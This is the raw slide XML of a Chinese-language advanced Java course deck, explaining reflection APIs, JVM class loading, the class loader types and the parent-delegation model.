          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>适用场景：需求难以获取和确定、软件开发风险较大的软件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>系统。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:rand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-Java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" spc="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>进阶</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940" y="1195070"/>
            <a:ext cx="11421745" cy="5120005"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>类对象的获取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1、通过对象获取，obj.getClass();</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2、通过类路径名获取，Class.forName("com.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>zcsz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Apple</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>");</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>3、通过类名获取，Object.class;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>其他常用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、getField、getMethod和getCostructor方法可以获得指定名字的域、方法和构造器。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、getFields、getMethods和getCostructors方法可以获得类提供的public域、方法和构造器数组，其中包括超类的共有成员。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、getDeclatedFields、getDeclatedMethods和getDeclaredConstructors方法可以获得类中声明的全部域、方法和构造器，其中包括私有和受保护的成员，但不包括超类的成员。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>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-Java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" spc="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>进阶</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940" y="1195070"/>
            <a:ext cx="4136390" cy="5120005"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>反射的调用流程：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1、编写完Java项目之后，java文件都会被编译成一个.class文件</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2、这些class文件在程序运行时会被ClassLoader加载到JVM中，当一个类被加载以后，JVM就会在内存中自动产生一个Class对象。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>3、通过Class对象获取 Field（属性）、Method（方法）、Construcor（构造函数）我们平时通过new的形式创建对象，本质上就是通过Class来创建个新对象</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4337050" y="1313180"/>
            <a:ext cx="7185660" cy="4853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-Java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" spc="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>进阶</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940" y="1195070"/>
            <a:ext cx="11421745" cy="5120005"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Class对象</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Class对象 是内存中对应类的对象。一个类被加载后，JVM会创建一个对应类的Class对象，类的整个结构信息会放到对应的 Class对象 中。这个 Class对象 就像一面镜子一样，通过这面镜子我们可以看到对应类的全部信息。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>加载完类之后，在堆内存中，就产生了一个Class类型的对象（一个类只有一个 Class对象）。这个对象也称为 反射对象。同一个类，它只会被加载一次，同一个类只会有一个反射对象。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1398905" y="2672715"/>
            <a:ext cx="8824595" cy="3880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-Java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" spc="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>进阶</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940" y="1195070"/>
            <a:ext cx="11421745" cy="5120005"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN"/>
              <a:t>类加载</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN"/>
              <a:t>机制：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:t>虚拟机把描述类的数据从Class文件加载到内存，并对数据进行校验、转换解析和初始化，最终形成可以被虚拟机直接使用的Java类型，这就是虚拟机的类加载机制。</a:t>
            </a:r>
          </a:p>
          <a:p/>
          <a:p>
            <a:r>
              <a:t>类加载的时机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN"/>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:t>遇到new（比如new Student()）、getstatic和putstatic（读取或设置一个类的静态字段，如下代码，读取被final修饰并已在编译器把结果放入常量池的静态字段除外）、invokestatic（调用类的静态方法）这四条指令时，如果对应的类没有初始化，则要对对应的类先进行初始化。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:t>使用java.lang.reflect包方法时对类进行反射调用的时候。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:t>初始化一个类的时候发现其父类还没初始化，要先初始化其父类。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:t>当虚拟机开始启动时，用户需要指定一个主类（main），虚拟机会限制性这个主类的初始化。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>类加载的过程：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2284730" y="4508500"/>
            <a:ext cx="5554980" cy="2122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-Java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" spc="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>进阶</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36525" y="1113155"/>
            <a:ext cx="11306175" cy="5120005"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>加载：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>-&gt; class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>对象；</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>加载过程主要是靠类加载器实现的，包括用户自定义类加载器。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="456565" y="1903095"/>
            <a:ext cx="10986135" cy="3987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-Java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" spc="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>进阶</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270510" y="1195070"/>
            <a:ext cx="11306175" cy="5120005"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>加载的过程：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>在加载过程中，JVM主要做以下3件事：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、通过一个类的全限定名来获取定义此类的二进制字节流（class文件）。在程序运行过程中，当要访问一个类时，若发现这个类尚未被加载，并满足类初始化的条件时，就根据要被初始化的这个类的全限定名找到该类的二进制字节流，开始加载过程</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、将这个字节流的静态存储结构转化为方法区的运行时数据结构（即Class对象）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、在内存中创建一个该类的java.lang.Class对象，作为方法区该类的各种数据的访问入口</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>程序在运行中所有对该类的访问都通过这个类对象，也就是这个Class对象是提供给外界访问该类的接口。</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-Java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" spc="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>进阶</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270510" y="1195070"/>
            <a:ext cx="5215890" cy="5273675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>启动类加载器：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>由C++实现，不是ClassLoader子类。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>负责加载JAVA_HOME\lib目录中的，或通过-Xbootclasspath参数指定路径中的，且被虚拟机认可（按文件名识别，如rt，jar）的类。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>扩展类加载器：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>负责加载JAVA_HOME\lib\ext目录中的，或通过java.ext.dirs系统变量指定路径中的类库。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>应用程序类加载器：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>负责加载用户路径（classpath）上的类库。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>自定义类加载器：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>上述的加载器只能加载指定目录下的jar和class，如果想加载其他位置的jar或类时，则需要实现自定义类加载器来加载。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4" descr="图片2 (2)"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5486400" y="1193800"/>
            <a:ext cx="5605145" cy="5437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-Java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" spc="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>进阶</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270510" y="1195070"/>
            <a:ext cx="5198745" cy="5119370"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>双亲委派</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>模型：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>加载过程中会先检查类是否被已加载，检查顺序是自底向上，从Custom ClassLoader到BootStrap ClassLoader组层检查，只要某个classloader已加载就视为已加载此类，保证此类只加载一次。而加载的顺序是自顶向下，也就是由上层来组层尝试加载此类。这种类加载的层次关系就是双亲委派模型。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>通过层次化的委派机制，确保类的唯一性和核心类的安全性，同时提高了加载效率。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5605780" y="1635760"/>
            <a:ext cx="5971540" cy="4013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-Java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" spc="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>进阶</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270510" y="1195070"/>
            <a:ext cx="11306175" cy="5120005"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>例如：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>假设我们有以下类结构：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>java.lang.Object（由Bootstrap ClassLoader加载）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>java.util.ArrayList（由Extension ClassLoader加载）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>com.example.MyArrayList（由应用类加载器加载）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
